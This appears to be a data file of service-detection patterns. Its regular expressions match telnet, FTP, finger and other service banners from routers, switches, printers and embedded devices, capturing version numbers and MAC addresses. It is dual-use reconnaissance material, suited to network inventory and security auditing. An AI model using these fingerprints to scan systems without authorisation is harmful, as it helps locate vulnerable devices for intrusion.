+\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\xff\xfe\"\xff\xfc\"Username Access Verification\r\n\r\nLogin : +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to Telnet Server ([\w._-]+)\r\n\x1b\[0m\x1b\[2J\x1b\[05;28H(SM\w+) Managed Switch\x1b\[07;22H\x7fTallahasseeAdmin-Block\x1b\[15;30Husername:\x1b\[17;30Hpassword:\x1b\[15;39H +\r\n\r\nPassword required, but none set\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1fWelcome to your TiVo\r\n\r\n=\[tivo:root\]-# +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03AMBIT Cable Modem\r\n\r\nlogin: +refused in\.telnetd from [-\w_.]+ logged\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Access DENIED\.\r\n +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;.*Business Policy Switch 2000 +BeanShell ([-\w_.]+) - by Pat Niemeyer \(pat@pat\.net\)\nbsh % +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\r\n\(Aruba800\) \r\nUser: +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;1H\x1b.*BayStack 420 +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03SHARP (MX-\w+) Ver ([-\w_.]+) TELNET server\. +\xff\xfb\x01\xff\xfb\x03Welcome to (DCS-\w+) telnet daemon\r\n\r\nPassword: +\xff\xfb\x01\r\nVoIP Phone V([-\w_.]+) settings\r\nPassword: +\xff\xfb\x01\r\nAIRAYA login: +\xff.\x01\0?\xff\xfd.*Welcome to ViewStation.*Password: +AD6680 Gateway Software\r\n[-\w_]+ \(MAC ([\w:]+)\)\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nHP ProLiant BL p-Class C-GbE2 Interconnect Switch A\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Netgear DM111 ADSL2\+ Modem \r\nSoftware Version: ([-\w_.]+)\r\nLogin name: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0\0\0\0\0\0\r\nServer Model : 2U1P Print Server\0+\r\nF/W Version : ([\w._-]+).*\r\nMAC Address : ([\w ]+) +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\r\n\r\nMMC Technology Telnet\r\nMW-3000AP \w+\( Combo ([-\w_.]+) \)\r\n\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r.*\n\r\n\rSoftware Release R([-\w_.]+)\([^)]+\)\n\rCopyright \(c\) 2001-2003 by D-Link, Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\r\nWelcome to the WhatRoute TELNET Server\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nCNU-550pro login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03picotux login: +\xff\xfb\x03\xff\xfd\x18\xff\xfb\x01\xff\xfd\x1f\xff\xfd!\r\nCadant C3 CMTS\r\n +\r\n\(c\) Copyright 2005, Extron Electronics, IPL T S2, V([\d.]+), +\xff\xfb\x01\xff\xfb\x03\r\n.*HM410dp ADSL2\+ Router\r\n\r\nLogin: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03NS-30G Ver ([-\w_.]+) TELNET server\.\r\0\nCopyright \(c\) \d+ KYOCERA +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X4100 version V\.([-\w_.]+) Rev\. (\d+) \(Patch (\d+)\) from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfe\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfb\x03\xff\xfb\x01\r\nZyXEL Corporation Embedded Telnet Server \(c\) 2000-2003\r\n +\xff\xfb\x01\xff\xfb\x03\*\*\* Lantronix UDS1100 Device Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) \r\0\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 2004-2006 3Com Corp\. and its licensors\. +\xff\xfd\x03\xff\xfb\x01\r\n\r\nProduct type: Avaya (\w+) Media Gateway Release ([\w._-]+)\r\n\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm500 Jade \d+ \(based on ([\w._-]+)\)\r\n\rwelcome on your dreambox! - Kernel ([\w._-]+) \([\d:]+\)\.\r\n\rdm500 login: +\r\nSorry, this system is engaged by a rlogin session\.\r\nHost IP address: ([\d.]+)\.\nLogin name: ([\w._-]+)\.\n +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\n\r\nUser Access Verification\r\n\r\nUsername: +Connected\r\nUse log command to LOGON\r\n +\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) Command Shell\r\nPassword: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) V([\w.]+) Command Shell +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4021\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0SNTP Version ([\d.]+) Server ([\w._-]+)\n\r\0\r\0\nMAC address (\w+)\n\r\0Software version V[\d.]+ \(\d+\) ([\w._-]+)\r\0\nPassword : +uShare \(([\w._-]+)\) \(Built .*\)\nFor a list of registered commands type \"help\"\n\n> +SMPlayer ([\w._-]+)\r\nType help for a list of commands\r\n +Sorry, already connected\.\r\n| p|Slirp PPP/SLIP-on-terminal emulator telnetd +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\r\nCopperJet ([\w._-]+) RouterPlus .*\r\nFirmware version: ([\w._ -]+)\r\nAllied Data Technologies\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x03Welcome to the Windows CE Telnet service on MP370\r\n\r\nPocket CMD v ([\w._-]+)\r\n\\> \n\r\n\\> \\> +\xff\xfb\x01\r\n3Com Access Point 7760 login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 login: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03PRICOM 3100 Ver ([\w._-]+) TELNET server\.\r\0\nCopyright \(C\) 2002-2004 silex technology, Inc\.\r\0\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\r\n\r\r\nWelcome to Aerohive Wireless Product\r\r\n\r\r\nlogin: +\xff\xfb\x01\xff\xfb\x03\r\nLexmark International Telnet\r\n\r\nlogin: +\xff\xfb\x03\xff\xfb\x01Alcatel-Lucent: A7510\r\nA7510_(R\d+) .*\r\n\r\n\r\nLogin: +\xff\xfd\x18\xff\xfd\x1f\xff\xfd!\xff\xfd\x17\xff\xfb\x01\xff\xfb\x03\xff\xfd \xff\xfd#\r\n\r\n Welcome to OpenVMS \(TM\) VAX Operating System, Version V([\w._-]+) \r\n\r\n\r\0Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n>>> System ([\w._-]+) - OpenVMS Alpha V([\w._-]+) <<<\r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nGbE2c L2/L3 Ethernet Blade Switch for HP c-Class BladeSystem\.\r\n\r\nCopyright\(C\)2003 Hewlett-Packard Development Company, L\.P\.\r\n\r\n\r\nEnter tacacs username: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03U\.S\. Robotics ADSL 4-Port Router\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0\*\*\* Mitsubishi ProjectorView Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) MELCO\r\0\n\n\r\0Press Enter for Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n === IMPORTANT ============================\r\n Use 'passwd' to set your login password\r\n this will disable telnet and enable SSH\r\n ------------------------------------------\r\n\r\n\r\nBusyBox v(.*) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n ___ ___ ___ \r\n\( _`\\ _ /'___\)'___\) Bifferboard mini-distribution v([\w._-]+)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 =======================\r\n DSL-500B \r\n =======================\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWelcome to Linux \(ZEM500\) for MIPS\r\n\rKernel ([\w._-]+) \w+ on an MIPS\r\n\rZEM500 login: +\xff\xfb\x01\xff\xfe\x01Connected\r\n\n\rAironet BR500E V([\w._-]+) Main Menu +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TrioLink \(ADSL IAD\)\r\nLogin: +Linux ([\w._-]+) \[INSTALL: [\d-]+\]\nLASTPATCH: [\d:-]+\n +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\x1b\[0;37;40m\x1b\[2J\x1b\[1;1HLogin Name: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Xcelerator IP \r\nLogin: +odec=\d+ u=\d+, p=\d+, i=\d+, max entries = \d+ \r\n\d+: IMGREQUEST: request_stats, image buffers available = \d+ \r\n\d+: MAIN: (\d+) images\(J=\d+, P=\d+, I=\d+\) stored on disk in last minute +\r\nSiemens 5940 T1E1 \[COMBO\] Router \([\w._-]+\) v([\w._-]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to Dinion-IP-NWC [\d.]+ from [\d.]+\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfe\x01\xff\xfd\0\r\nser2net port \d+ device (/dev/[-\w_]+) \[\d+ \w+\] \(Debian GNU/Linux\)\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rTerminal shell v1\.0\n\r\rCopyright \xa92008 Motorola, Inc\. All rights reserved\.\n\r\rNetopia Model ([\d-]+)(?: AnnexA)? High-Power Wireless DSL Ethernet Managed Switch\n\rRunning Netopia SOC OS version ([\w.-]+ \(build \w+\))\n +\xff\xfb\x01\xff\xfb\x03ssss ssss sss s ss sss sss sss sssss \r\n s s s s s s s s s s s s s \r\n s s s s s s s s s s s \r\n s s ss s ss ssss s sss s ssss s s sss \r\n s s s s s s s s s s s s s s s \r\n s s s s s s s sss s s s s s s \r\n s s s s s s s s s s s s s s s s s \r\nssss ssss ssssss sss sss sssss ss sssss sss sss sssss\r\nLogin: +\r\nPRO2 Control Console\r\n +\w{12}\r\nETHMAC ([0-9a-f:]+)\r\nWIFIMAC ([0-9a-f:]+)\r\n> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWireless AP Manager Console [^\r\n]+\r\n please enter your password: +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05Login: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nYou are connected to configuration tool\r\nEnter the password: +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05\r\n\*\*\* Welcome to VTM \*\*\*\r\n\r\n\r\n\rLogin : +\r\nCEN-IDOC Control Console\r\n\r\nCEN-IDOC> +\xff\xfb\x01\r\nWelcome to Ring v([\d.]+) Copyright \(C\) AMX Corp\. 2002-2003\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TESTING MODEL ADSL Router\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\[([^]]*)\]\[([^]]*)\]\[([^]]*)\]\r\n +\xff\xfe\"\xff\xfb\x01\x1b<\x1b>\x1b\[\?25l\x1b\[0m\x1b\[2J\x1b\(B\x1b\)0\x0f\x1b\[7m\x1b\[f Areca Technology Corporation RAID Controller +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\r\n\r\n\*{76}\r\n\r\n +Minolta Network Configuration Utility\r\n +Minolta\r\n +Version ([\w.]+)\r\n +\xff\xfd\x03\xff\xfe\x01\xff\xfb\x01\s+ZebraNet Internal Wired PS Configuration Utility\r\n\r\n Type your password\. Press Enter when finished\.\r\n\r\n Password: +\xff\xfb\x01\n\rWelcome to TrueTime Network Interface\n\r\rUser name: +MythFrontend Network Control\r\nType 'help' for usage information\r\n---------------------------------\r\n# +\x1b\[0m\r\nWelcome to (IC-\d+)!\r\n\r\n\x1b7\x1b\[\?25l\x1b\[501;501H\x1b\[6n\x1b8\x1b\[\?25h\r\x1b\[0m\x1b\[1mIC-\d+ # \x1b\[0m\x1b\[J\r\x1b\[10C +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x0c\x1b\[2JEnter Password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\r\n\rWelcome to DreamBox\.\r\n\rRunning under Kernel ([\w._-]+) \.\r\n\rBased on (Gemini [\w._-]+ GUI)\.\r\n\rKernel and utilities compiled by SatDream\.\r\n\r\r\n\r\r\n\rhttp://www\.satderam\.ru , info@satdream\.ru , dreambox@satdream\.ru\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nBNT Layer 2/3 Copper Gigabit Ethernet Switch Module for IBM BladeCenter\.\r\n\r\n\r\nEnter password: | p|Nortel Layer 2/3 Gigabit Ethernet switch for IBM BladeCenter +\xff\xfb\x01\xff\xfd\"\r\n##### #### ## ## #### #####\r\n## ## ## ## ## # ## ## ## ##\r\n## ## ###### ####### ## #####\r\n## ## ## ####### ## ## ##\r\n## ## ##### ## ## #### ######\r\n A Butter Team Creation\r\n\r\nPassword : +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfe\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05TiMOS-([\w._-]+) cpm/hops ALCATEL SR (\w+) +\xff\xfb\x01\xff\xfb\x03\r\n\x1b\[1;1H\x1b\[2J\r\n\r\nObeh\xf6riga \xe4ga ej tilltr\xe4de\r\n\r\n\xf6vertr\xe4delse beivras\.\r\n\r\n\rUsername: +\n\rTA-005-FXO1-122M : CLI\n\rLogin : +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista/2008 Ver\. ([\w._-]+)\n\rEvaluation copy, \d+ users enabled\. Expiration date is ([\d/]+)\.\n\r\n\rUser \d+ of \d+\n\r\n\rlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\+{79}\r\n\r\+{33}#############\+{33}\r\n\r\+{28}###### ######\+{28}\r\n\r +\xff\xfb\x01\xff\xfb\x03BR-telnet@(FES\w+) Router> +\xff\xfb\x01\xff\xfb\x03\r\n\r\nCopyright \(c\) 2005 - 2008 Enterasys, Inc\. All rights reserved\.\r\n\n\r\n\r\n\r\0Username: +\r={74}\n\rTransition Networks Telnet Server\n\rSystem name: SMKG-PKGEAST-([\w._-]+)\n\rPress CTRL-D to disconnect\.\n\rEnter password: +\xff\xfb\x03\xff\xfb\x01\r\n \*{73}\r\n This is a private system\. \r\n Do not attempt to login unless you are an authorized user\. \r\n Any authorized or unauthorized access or use may be monitored and can\r\n result in criminal or civil prosecution under applicable law\.\r\n \*{73}\r\n\r\nMP login: +\xff\xfe\"\xff\xfb\x01\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[5B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[6B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[7B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[2B Verify Password \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[4B \x0e\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[8C\x1b\[9B\x1b\[1Blqqqqqqqqqqqqqqqqqqqk\x1b +Sorry, new remote sessions are disallowed by current switch configuration\. +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\x1b\[H\x1b\[J\r\nWireless Router Manager Console , Version : ([\w._-]+)\r\nPlease enter your password : +\xff\xfb\x01\xff\xfb\x03\*{60}\r\n\* WARNING ALERT: AUTHORIZED USERS ONLY! +\*\r\n\* +\*\r\n\* All activities conducted on this system may be monitored \*\r\n\* and recorded\. If you are not an authorized user, log off \*\r\n\* immediately\. Illegal entry, misuse, and / or criminal \*\r\n\* activity will be documented and prosecuted to the full \*\r\n\* extend of the law\. +\*\r\n\*{60}\r\n\r\n\r\nPress to accept and continue the login process\.\.\.\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\x1b\[2J\x1b\[1;1H\x1b\[1mwb-adtran-\w+ ADTRAN (TDU-\w+)\x1b\[0m\x1b\[2;1HConnecting\.\.\.\. +\r\n%connection closed by remote host!\0 +Sorry, telnet is not allowed on this port! +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nBUFFALO INC\. LinkStation series HS-DHGL\(JINMU\)\r\n\rFENCHURCH login: +\nFelix Remote Shell Console:\r\n============================\r\n\r\n-> +\r\n\r\nBackup Server Telnet Session\r\n\r\nUser: +\xff\xfb\x01\xff\xfd\"\[game001\] remote control session\.\r\nPassword:\0 +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve J\w+ Switch ([\w-]+)\r\n\rSoftware revision ([\w._-]+)\r\n +\xff\xfb\x01\r\nNetDVRDVS: +nodnsquery/[\d.]+ is not authorized to use the telnet proxy\r\n +\xff\xfc\x01\xff\xfd\"ixProxy V([\d.]+), Copyright \(C\) \d+ Ixia Communications\r\nEnter target port ip address as login name \(example: 10\.0\.1\.1\)\r\nlogin: +\0\0\0H\0\0\0\x02\x0fTimeEdit131\. +0301&<\x16\0\x84\xc7\x02\xe0\xe1\xb1\x008\x13\x1e\x0b\x80<\x16\0\xc7\t\x8f\x05\xc0\xf0X\0\x1c\xc2c\x01p\x1e\x0b\x80\xe3c\x01p\xdcX\0\x1c7\x8f\x05\xc0q\x0b\x80\xe3F\xc7\x02\xe0\xb8,\0\x8e\x1b\xb1\x008n\x05\xc0q\xa3\x008n\xb4\x02\xe0\xb8\xd1\x01p\xdch\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\x03\0\x04\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\r\0\x03\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x9a\x20\xd0Z\x1e\x1b\xa3\*\xf2\xdd\xe2\(\xc3sp&\xda\xe4Yp\xdbET\xf9\x8cc\xc24\*Y\xbe\xb3\xba\xd6%\xf5\xb668\xad\xab>@D<\x01\xdd>\)\xdb\x18\xf55\xd1\xba\x96\x1c\x17\x17\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x01 +\x0f\0\n\0\x01\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x0b\0\0\0GBXRemote 2 +VTUN server ver \. (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +VTUN server ver \(.*\) (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +250 OK moleSoftware VHCS2 Server Welcomes You !\r\n +TrueWeather\r\n\r\n> +\x96\xfeS\xab +\+ read portFile\n\+ head -1\n\+ find /var/websm/ +([-\w_.]+) xine-ui ([\d.]+) remote server\. Nice to meet you\.\n +Vty password is not set\.\r\n +\r\nUser Access Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfe\"\xff\xfd\x1fPassword: +bp[-\w]+: error while loading shared libraries: libstdc\+\+-libc6\.2-2\.so\.3: cannot open shared object file: No such file or directory\n +\0\x0e@........\0\0\0\0\0 +\0\*@.*\0\0\0\0\0 +\0<\xaa\xc5\r\^\xf7\x1b\xd1\xe1a/\xe8\x17P\x9dOb\xbb\x93\x87\xe0\xf3v\x81K\xa4!\xe6\xc7\x01\x977u5A\xd1M\x1b;\xc7\xcb\x87\xb5\x87\xf3~\xc8w\xef\xd3\x87eA\0\^\xbf\xc5\x93i\xf6\x87 +\xa5A\0\x01\0\0\0,\0\0\0\x02\0\0\0L\0\0\0\x08Connect\0\0\0\0x\0\0\0\x0857222\0\0\0 +.\x01.[\x02\x03]\x01\d+\0 +OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n +SuSE Meta pppd \(smpppd\), Version ([\d.]+)\r\n +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6\x7d\x27\x7d\x22\x7d\x28\x7d\x22\xc7\x7d\x23\x7e +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80\x7e +-=QDS Task Refactoring Dev v([\w._-]+) Debug Tracing LiveView=-\r\nType quit or \^X to close connection\.\r\n\r\n +503 Service Unavailable\r\n\r\n\0 +Microsoft Windows XP \[Version [\d.]+\]\n\(C\) Copyright 1985-\d+ Microsoft Corp\.\n\nC:\\> +HELLO Welcome to Tunnel Vision \(([\d.]+)\)\n +\0\0\0\x04Z(\d)([1-9]\d) +Invalid request string: Request string is: \"\r\" +Feedback\nError=You need unique ID to command ABC! +#connected,all connect count: 1{\"event\":\"device_status\",\"data\":{\"wifi_name\":\"([^\"]+)\",\"wifi_signal\":\d+,\"battery\":\d+,\"batterycharging\":\w+,\"gsm_signal\":\d+,\"sms_unread\":\d+,\"sdcard\":\d+,\"updateinfo\":null}} +-\0\0\0\0| p|IBM OS/400 as-servermapd| o|OS/400 +\x99\xf3\0\0\0\0\0\0\xff\xff\xff\xff +\0\0\0\0\0\0\0\x08 +\[AUTHPOINT RESPONSE\]\r\nreturn_code=AUTHPOINT ERROR\r\nreturn_code_text=Error response parsed by base message object: Invalid or missing register #\r\nresponse=\r\nidentifier=\r\napproval_code=\r\n +Unknown command\r\n +Can't fork pty, bye!\n +Message received\n +Use of uninitialized value in transliteration \(tr///\) at /var/jchkmail/user-filter +Connection from \[[\d.]+\]\r\n\r\nEnter your account name and password\.\r\nSorry, there is no guest account\.\r\n\r\nUsername: +\r\nEnter your account name and password\.\r\n\r\nUsername: +\n\x03 +unrecognized op\n\x03 +\nunrecognized op\n\n\x03 +\n(\d+)\n(\d+)\n(\d+) +\xc0\0\x01\0....\0\0\0\x03 +200-At least a module and a command must be specified\r\n200-At least a module and a command must be specified\r\n +\nWelcome to the Computone IntelliServer `([\w._-]+)'\nRunning cnx kernel release ([\w._, -]+)\n\npt-ses day time owner command\n +Idle\r\n +UNKNOWN COMMAND\n +_err=refused%20by%20workers\r\n +ok\r\nunknown command\r\nunknown command\r\n +Expecting SSL \(optional\) and CONFIG as first commands\.\n +X01\r\nX01\r\n +Invalid FT GWADDR / START protocol\n +\x03Not a valid name\. This may because you left it blank or used invalid symbols\. Please try again\.\n +Finger online user list request denied\.\r\n +Username Real name Idletime TTY Remote console location\n +Login Name Tty Idle Login Time Office Office Phone\r\n +\r\nIntegrated port\r\nPrinter Type: Dell Laser Printer ([-\w+.]+)\r\nPrint Job Status: (.*)\r\n +This is ([-\w_.]+) finger server\.\r\n\r\nPlease use username@domain format\.\r\n +\r\nIntegrated port\r\nPrinter Type: Lexmark ([^\r\n]+)\r\n +finger: /var/adm/lastlog open error\nNo one logged on\r\n +Debian GNU/Linux Copyright \(C\) 1993-1999 Software in the Public Interest\n.*You haven't specified a user\.\n\n A general listing is not provided to the public\. +\r\nPrinter Type: Lexmark Optra LaserPrinter\r\n +MSS485 Version V([\w._/-]+)\(([\w._-]+)\) - Time Since Boot: +220 Welcome to Stupid-FTPd server\.\r\n422 Too busy to play with you\.\r\n +520 invalid command\n +\xea\xdd\xbe\xef\0\0\0\x05\0\0\x000\0\0\x000\0\0..\0\0\0\x08\0a\0f\0f\0s\0p\0r\0n\0g\0\0\0\0\0\0\0\0 +220 Inactivity timer = \d+ seconds\. Use 'site idle ' to change\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n +220 \r\n500 Unknown command: \"\"\r\n500 Unknown command: \"\"\r\n +220 ([-.\w]+) FTP Server ready \.\.\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n +220 \"Welcome to Bot FTP service\.\"\r\n331 Please specify the password\.\r\n230 Login successful\. Have fun\.\r\n +220 OK\n226 OK\n +220 Welcome to pyftpd\. Happy downloading\.\r\n500 I'm gonna ignore this command\.\.\. maybe later\.\.\.\r\n +220 ([\w._-]+) server ready\.\r\n502 command not implemented\.\r\n502 command not implemented\.\r\n +220 UnleashX FTP ready\.\r\n503 Login with USER first\.\r\n +220 ps2ftpd ready\.\r\n500 Not understood\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\"\r\n\r\n\n\rauthentication failed!\n\rpassword: +\xff\xfc\"\xff\xfb\x01\r\nPassword: \r\nbad password\r\n| p|Campbell Scientific NL-100/105 Ethernet-to-serial bridge telnetd +FlashCONNECT ([\d.]+) invalid message\.\n +\\0\0\0\xd4\x17\0\0\x01\0\0\0\x05\0\0\0\x01\0\0\0\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\nBad connect string! +{type INIT} {up \d+} {auth \d+} {name {([^}]+)}} {ip [\d.]+} {max \d+} {port (\d+)}\r\n 